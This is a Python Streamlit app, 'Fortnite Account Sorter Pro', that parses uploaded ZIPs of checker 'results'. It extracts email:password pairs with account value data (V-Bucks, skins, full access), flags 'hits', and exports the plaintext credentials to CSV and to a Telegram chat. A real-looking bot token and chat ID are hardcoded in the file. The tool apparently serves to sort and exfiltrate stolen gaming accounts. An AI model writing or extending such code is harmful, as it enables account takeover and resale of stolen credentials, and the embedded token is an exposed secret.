import os
import re
from collections import defaultdict
import csv
from datetime import datetime
import zipfile
import tempfile
import streamlit as st
import json
import requests
import io
import shutil
import streamlit.components.v1 as components

# --- Configuration ---
# Your Telegram credentials (Pre-loaded)
DEFAULT_TG_TOKEN = "8320526788:AAECI8pPkEqUOEV3JaAz8VEVoLDKfnY2BCY"
DEFAULT_CHAT_ID = "-1003446261251"

# Set page config for wide layout
st.set_page_config(
    page_title="Fortnite Sorter Pro",
    page_icon="🎮",
    layout="wide",
    initial_sidebar_state="expanded"
)

# --- Telegram Functions ---
def send_telegram_message(token, chat_id, message):
    """Sends a text message to Telegram."""
    url = f"https://api.telegram.org/bot{token}/sendMessage"
    payload = {
        "chat_id": chat_id,
        "text": message,
        "parse_mode": "Markdown"
    }
    try:
        response = requests.post(url, json=payload)
        return response.json()
    except Exception as e:
        return {"ok": False, "description": str(e)}

def send_telegram_document(token, chat_id, file_buffer, filename, caption=""):
    """Sends a file to Telegram."""
    url = f"https://api.telegram.org/bot{token}/sendDocument"
    data = {"chat_id": chat_id, "caption": caption}
    files = {"document": (filename, file_buffer, "text/csv")}
    try:
        response = requests.post(url, data=data, files=files)
        return response.json()
    except Exception as e:
        return {"ok": False, "description": str(e)}

# --- Core Parser Class ---
class FortniteAccountParser:
    def __init__(self):
        self.accounts = defaultdict(dict)
        self.stats = {
            "total_accounts": 0,
            "total_vbucks": 0,
            "fa_yes": 0,
            "stw_yes": 0,
            "hit_accounts": 0,
            "total_skins": 0,
            "total_matches": 0,
            "platforms": defaultdict(int)
        }
        self.date_counts = defaultdict(int)

    def normalize_bool(self, value):
        if isinstance(value, str):
            lower = value.lower()
            return 'Yes' if lower in ('yes', 'true', '1') else 'No'
        return 'Yes' if value else 'No'

    def parse_line(self, line, file_source='unknown'):
        line = line.strip()
        if not line or line.startswith('#') or 'generated by' in line.lower() or '====' in line:
            return None
        
        account = {}
        
        # Regex for Email:Pass
        email_pass_match = re.search(r'([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)[:|\s]+([^|\s]+)', line)
        if not email_pass_match:
            return None
            
        account['email'] = email_pass_match.group(1).strip()
        account['password'] = email_pass_match.group(2).strip()
        
        remaining = line.replace(f"{account['email']}:{account['password']}", "")
        
        # Parsing Attributes
        fa_match = re.search(r'(?:FA|Full Access)[:\s]*([a-zA-Z0-9]+)', remaining, re.IGNORECASE)
        account['fa'] = self.normalize_bool(fa_match.group(1)) if fa_match else 'No'
        
        twofa_match = re.search(r'(?:2FA|Two Factor)[:\s]*([a-zA-Z0-9]+)', remaining, re.IGNORECASE)
        account['twofa'] = self.normalize_bool(twofa_match.group(1)) if twofa_match else 'No'
        
        stw_match = re.search(r'(?:STW|Save The World)[:\s]*([a-zA-Z0-9]+)', remaining, re.IGNORECASE)
        account['stw'] = self.normalize_bool(stw_match.group(1)) if stw_match else 'No'
        
        vbucks_match = re.search(r'(?:Vbucks|V-Bucks|V Bucks)[:\s]*(\d+)', remaining, re.IGNORECASE)
        account['vbucks'] = int(vbucks_match.group(1)) if vbucks_match else 0
        
        skins_count_match = re.search(r'Skins[:\s]*\[(\d+)\]', remaining, re.IGNORECASE)
        if not skins_count_match:
             skins_count_match = re.search(r'Skins[:\s]*(\d+)', remaining, re.IGNORECASE)
        account['skins'] = int(skins_count_match.group(1)) if skins_count_match else 0
        
        account['skin_names'] = []
        skin_names_match = re.search(r'Skins:.*?\[\d*\]:?\s*(.+?)(?=\s*\||$)', remaining, re.IGNORECASE)
        if skin_names_match:
            raw_skins = skin_names_match.group(1)
            account['skin_names'] = [s.strip() for s in raw_skins.split(',') if s.strip()]

        lp_match = re.search(r'Last Played[:\s]*([^|]+)', remaining, re.IGNORECASE)
        account['last_played'] = lp_match.group(1).strip() if lp_match else 'Unknown'
        
        user_match = re.search(r'Username[:\s]*([^|]+)', remaining, re.IGNORECASE)
        account['username'] = user_match.group(1).strip() if user_match else 'Unknown'
        
        matches_match = re.search(r'(?:Matches Played|Matches)[:\s]*(\d+)', remaining, re.IGNORECASE)
        account['matches_played'] = int(matches_match.group(1)) if matches_match else 0
        
        points_match = re.search(r'Points[:\s]*=?\s*(\d+)', remaining, re.IGNORECASE)
        account['points'] = int(points_match.group(1)) if points_match else 0
        
        plat_match = re.search(r'Platform[:\s]*([^|]+)', remaining, re.IGNORECASE)
        account['platform'] = plat_match.group(1).strip() if plat_match else 'Unknown'
        
        level_match = re.search(r'Level[:\s]*(\d+)', remaining, re.IGNORECASE)
        account['level'] = int(level_match.group(1)) if level_match else 0
        
        account['source_file'] = file_source
        account['is_hit'] = (account['fa'] == 'Yes' and account['stw'] == 'Yes') or (account['skins'] > 50) or (account['vbucks'] > 500)
        
        return account

    def merge_account(self, existing, new):
        """Merges new data into existing account."""
        for key in ['vbucks', 'skins', 'matches_played', 'points', 'level']:
            if new.get(key, 0) > existing.get(key, 0):
                existing[key] = new[key]
        
        for key in ['fa', 'twofa', 'stw']:
            if existing.get(key) != 'Yes' and new.get(key) == 'Yes':
                existing[key] = 'Yes'
                
        for key in ['last_played', 'username', 'platform']:
            if existing.get(key, 'Unknown') in ['Unknown', ''] and new.get(key, 'Unknown') not in ['Unknown', '']:
                existing[key] = new[key]
                
        if len(new.get('skin_names', [])) > len(existing.get('skin_names', [])):
            existing['skin_names'] = new['skin_names']
            
        existing['is_hit'] = (existing['fa'] == 'Yes' and existing['stw'] == 'Yes') or (existing['skins'] > 50) or (existing['vbucks'] > 500)

    def process_directory(self, root_dir, progress_callback=None):
        """Recursively finds ALL txt files."""
        all_files = []
        for root, _, files in os.walk(root_dir):
            for file in files:
                if file.endswith('.txt'):
                    all_files.append(os.path.join(root, file))
        
        total_files = len(all_files)
        if total_files == 0:
            return 0
            
        processed_count = 0
        
        for filepath in all_files:
            parent_folder = os.path.basename(os.path.dirname(filepath))
            try:
                with open(filepath, 'r', encoding='utf-8', errors='replace') as f:
                    for line in f:
                        parsed = self.parse_line(line, parent_folder)
                        if parsed:
                            email = parsed['email']
                            if email in self.accounts:
                                self.merge_account(self.accounts[email], parsed)
                            else:
                                self.accounts[email] = parsed
                                self.date_counts[parent_folder] += 1
            except Exception:
                pass 
            processed_count += 1
            if progress_callback:
                progress_callback(processed_count / total_files)
                
        self.calculate_stats()
        return processed_count

    def calculate_stats(self):
        self.stats["total_accounts"] = len(self.accounts)
        self.stats["total_vbucks"] = sum(a['vbucks'] for a in self.accounts.values())
        self.stats["fa_yes"] = sum(1 for a in self.accounts.values() if a['fa'] == 'Yes')
        self.stats["stw_yes"] = sum(1 for a in self.accounts.values() if a['stw'] == 'Yes')
        self.stats["hit_accounts"] = sum(1 for a in self.accounts.values() if a['is_hit'])
        self.stats["total_skins"] = sum(a['skins'] for a in self.accounts.values())
        self.stats["total_matches"] = sum(a['matches_played'] for a in self.accounts.values())
        for a in self.accounts.values():
            p = a.get('platform', 'Unknown')
            self.stats["platforms"][p] += 1

    def get_csv_string(self):
        if not self.accounts:
            return ""
        output = io.StringIO()
        headers = ['email', 'password', 'fa', 'twofa', 'stw', 'vbucks', 'skins', 'skin_names', 
                   'last_played', 'username', 'matches_played', 'points', 'platform', 'level', 'is_hit']
        writer = csv.DictWriter(output, fieldnames=headers)
        writer.writeheader()
        for acc in self.accounts.values():
            row = acc.copy()
            row['skin_names'] = ", ".join(row['skin_names'])
            writer.writerow(row)
        return output.getvalue()

# --- HTML/CSS View ---
def render_html_view(accounts_json):
    html_code = f"""
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
        <style>
            @import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;600;800&display=swap');
            :root {{
                --bg: #0e1117;
                --card-bg: #1e2530;
                --card-border: #2d3748;
                --accent: #FF4B4B;
                --text: #e2e8f0;
                --text-muted: #94a3b8;
                --success: #10b981;
                --warning: #f59e0b;
                --danger: #ef4444;
            }}
            body {{
                background-color: transparent;
                color: var(--text);
                font-family: 'Inter', sans-serif;
                margin: 0;
                padding: 10px;
            }}
            .controls {{ display: flex; gap: 10px; margin-bottom: 20px; flex-wrap: wrap; }}
            .btn {{
                background: var(--card-bg); border: 1px solid var(--card-border); color: var(--text);
                padding: 8px 16px; border-radius: 8px; cursor: pointer; font-weight: 600;
                transition: all 0.2s; display: flex; align-items: center; gap: 6px;
            }}
            .btn:hover, .btn.active {{ border-color: var(--accent); color: var(--accent); background: rgba(255, 75, 75, 0.1); }}
            .search-bar {{
                flex-grow: 1; background: var(--card-bg); border: 1px solid var(--card-border);
                color: var(--text); padding: 8px 16px; border-radius: 8px; min-width: 200px;
            }}
            .grid {{ display: grid; grid-template-columns: repeat(auto-fill, minmax(320px, 1fr)); gap: 20px; }}
            .card {{
                background: var(--card-bg); border: 1px solid var(--card-border); border-radius: 12px;
                padding: 20px; position: relative; transition: transform 0.2s; box-shadow: 0 4px 6px -1px rgba(0, 0, 0, 0.1);
            }}
            .card:hover {{ transform: translateY(-4px); border-color: var(--accent); }}
            .card-header {{ display: flex; justify-content: space-between; align-items: start; margin-bottom: 15px; }}
            .email-box {{
                background: rgba(0,0,0,0.3); padding: 8px 12px; border-radius: 6px;
                font-family: monospace; font-size: 0.9em; word-break: break-all;
                border: 1px solid var(--card-border); cursor: pointer; transition: all 0.2s;
            }}
            .email-box:hover {{ border-color: var(--text-muted); }}
            .email-box:active {{ background: var(--accent); color: white; }}
            .badge {{
                padding: 4px 8px; border-radius: 4px; font-size: 0.75em;
                font-weight: 800; text-transform: uppercase; margin-right: 4px;
            }}
            .badge-hit {{ background: rgba(239, 68, 68, 0.2); color: var(--danger); }}
            .badge-fa {{ background: rgba(16, 185, 129, 0.2); color: var(--success); }}
            .badge-stw {{ background: rgba(245, 158, 11, 0.2); color: var(--warning); }}
            .stats-row {{
                display: flex; justify-content: space-between; margin-bottom: 12px;
                font-size: 0.9em; background: rgba(0,0,0,0.2); padding: 10px; border-radius: 8px;
            }}
            .stat {{ display: flex; flex-direction: column; align-items: center; }}
            .stat-val {{ font-weight: 800; font-size: 1.1em; }}
            .stat-label {{ font-size: 0.75em; color: var(--text-muted); }}
            .vbucks {{ color: #00d4ff; }}
            .info-grid {{
                display: grid; grid-template-columns: 1fr 1fr; gap: 8px; font-size: 0.85em;
                margin-top: 15px; padding-top: 15px; border-top: 1px solid var(--card-border);
            }}
            .info-item {{ display: flex; justify-content: space-between; }}
            .val-yes {{ color: var(--success); font-weight: bold; }}
            .val-no {{ color: var(--danger); }}
            .skins-preview {{
                margin-top: 10px; font-size: 0.8em; color: var(--text-muted);
                white-space: nowrap; overflow: hidden; text-overflow: ellipsis;
            }}
        </style>
    </head>
    <body>
        <div class="controls">
            <input type="text" class="search-bar" id="searchInput" placeholder="Search..." onkeyup="filterCards()">
            <button class="btn active" onclick="filterType('all', this)"><i class="fas fa-list"></i> All</button>
            <button class="btn" onclick="filterType('hit', this)"><i class="fas fa-fire"></i> HITs</button>
            <button class="btn" onclick="filterType('fa', this)"><i class="fas fa-lock-open"></i> FA</button>
            <button class="btn" onclick="filterType('stw', this)"><i class="fas fa-bolt"></i> STW</button>
            <button class="btn" onclick="filterType('vbucks', this)"><i class="fas fa-coins"></i> 1k+</button>
        </div>
        <div id="status" style="margin-bottom:10px; color: var(--text-muted); font-size: 0.9em;">Showing all</div>
        <div class="grid" id="grid"></div>
        <script>
            const accounts = {accounts_json};
            const grid = document.getElementById('grid');
            const status = document.getElementById('status');
            function render(data) {{
                grid.innerHTML = '';
                status.innerText = `Showing ${{data.length}} accounts`;
                if(data.length === 0) {{
                    grid.innerHTML = '<div style="grid-column: 1/-1; text-align:center; padding: 40px; color: #555;">No accounts.</div>';
                    return;
                }}
                data.forEach(acc => {{
                    const card = document.createElement('div');
                    card.className = 'card';
                    let badges = '';
                    if(acc.is_hit) badges += '<span class="badge badge-hit">HIT</span>';
                    if(acc.fa === 'Yes') badges += '<span class="badge badge-fa">FA</span>';
                    if(acc.stw === 'Yes') badges += '<span class="badge badge-stw">STW</span>';
                    const skinsText = acc.skin_names && acc.skin_names.length > 0 ? acc.skin_names.join(", ") : "No skin info";
                    card.innerHTML = `
                        <div class="card-header"><div>${{badges}}</div><div class="stat-val vbucks"><i class="fas fa-coins"></i> ${{acc.vbucks}}</div></div>
                        <div class="email-box" onclick="copy('${{acc.email}}:${{acc.password}}')">${{acc.email}}</div>
                        <div class="stats-row">
                            <div class="stat"><span class="stat-val">${{acc.skins}}</span><span class="stat-label">Skins</span></div>
                            <div class="stat"><span class="stat-val">${{acc.matches_played}}</span><span class="stat-label">Matches</span></div>
                            <div class="stat"><span class="stat-val">${{acc.level}}</span><span class="stat-label">Level</span></div>
                        </div>
                        <div class="info-grid">
                            <div class="info-item"><span>Platform:</span><span>${{acc.platform}}</span></div>
                            <div class="info-item"><span>FA:</span><span class="${{acc.fa === 'Yes' ? 'val-yes' : 'val-no'}}">${{acc.fa}}</span></div>
                            <div class="info-item"><span>STW:</span><span class="${{acc.stw === 'Yes' ? 'val-yes' : 'val-no'}}">${{acc.stw}}</span></div>
                            <div class="info-item"><span>Last Played:</span><span>${{acc.last_played}}</span></div>
                        </div>
                        <div class="skins-preview" title="${{skinsText}}"><i class="fas fa-tshirt"></i> ${{skinsText}}</div>
                    `;
                    grid.appendChild(card);
                }});
            }}
            function copy(text) {{ navigator.clipboard.writeText(text); }}
            function filterCards() {{
                const term = document.getElementById('searchInput').value.toLowerCase();
                const filtered = accounts.filter(acc => acc.email.toLowerCase().includes(term) || (acc.username && acc.username.toLowerCase().includes(term)) || (acc.skin_names && acc.skin_names.join(' ').toLowerCase().includes(term)));
                render(filtered);
            }}
            function filterType(type, btn) {{
                document.querySelectorAll('.btn').forEach(b => b.classList.remove('active')); btn.classList.add('active');
                let filtered = accounts;
                if(type === 'hit') filtered = accounts.filter(a => a.is_hit);
                if(type === 'fa') filtered = accounts.filter(a => a.fa === 'Yes');
                if(type === 'stw') filtered = accounts.filter(a => a.stw === 'Yes');
                if(type === 'vbucks') filtered = accounts.filter(a => a.vbucks >= 1000);
                render(filtered);
            }}
            render(accounts);
        </script>
    </body>
    </html>
    """
    return html_code

# --- Main App Logic ---
def main():
    with st.sidebar:
        st.header("📲 Telegram Bot")
        # Hardcoded Credentials from constants
        tg_token = st.text_input("Bot Token", value=DEFAULT_TG_TOKEN, type="password")
        tg_chat_id = st.text_input("Chat ID", value=DEFAULT_CHAT_ID)
        st.markdown("---")
        st.caption("Settings are pre-configured.")

    st.title("⚡ Fortnite Account Sorter Pro")

    uploaded_file = st.file_uploader("📂 Upload Results ZIP file", type="zip")
    
    if uploaded_file:
        if st.button("🚀 Process Accounts"):
            with st.spinner("Extracting and Processing..."):
                temp_dir = tempfile.mkdtemp()
                try:
                    with zipfile.ZipFile(uploaded_file, 'r') as z:
                        z.extractall(temp_dir)
                    
                    parser = FortniteAccountParser()
                    prog_bar = st.progress(0)
                    files_processed = parser.process_directory(temp_dir, lambda p: prog_bar.progress(p))
                    
                    st.success(f"Processed {files_processed} files!")
                    
                    # --- Actions ---
                    col1, col2 = st.columns([1, 1])
                    csv_data = parser.get_csv_string()
                    
                    with col1:
                        st.download_button("💾 Download Results (CSV)", data=csv_data, file_name=f"results_{datetime.now().strftime('%Y%m%d')}.csv", mime="text/csv", use_container_width=True)
                        
                    with col2:
                        if tg_token and tg_chat_id:
                            if st.button("✈️ Send to Telegram", use_container_width=True):
                                with st.spinner("Sending..."):
                                    s = parser.stats
                                    summary_msg = f"📊 *Fortnite Results*\n\n👤 Accounts: `{s['total_accounts']}`\n🔥 Hits: `{s['hit_accounts']}`\n💰 V-Bucks: `{s['total_vbucks']:,}`"
                                    
                                    msg_res = send_telegram_message(tg_token, tg_chat_id, summary_msg)
                                    file_res = send_telegram_document(tg_token, tg_chat_id, io.BytesIO(csv_data.encode()), "fortnite_results.csv")
                                    
                                    if msg_res.get("ok") and file_res.get("ok"):
                                        st.success("Sent!")
                                    else:
                                        st.error("Telegram Error.")

                    st.divider()
                    # --- Stats & View ---
                    s = parser.stats
                    c1, c2, c3, c4 = st.columns(4)
                    c1.metric("Accounts", s['total_accounts'])
                    c2.metric("V-Bucks", f"{s['total_vbucks']:,}")
                    c3.metric("Hits", s['hit_accounts'])
                    c4.metric("FA", s['fa_yes'])
                    
                    st.divider()
                    sorted_accs = sorted(parser.accounts.values(), key=lambda x: x['vbucks'], reverse=True)
                    components.html(render_html_view(json.dumps(sorted_accs)), height=800, scrolling=True)

                except Exception as e:
                    st.error(f"Error: {e}")
                finally:
                    shutil.rmtree(temp_dir, ignore_errors=True)

if __name__ == "__main__":
    main()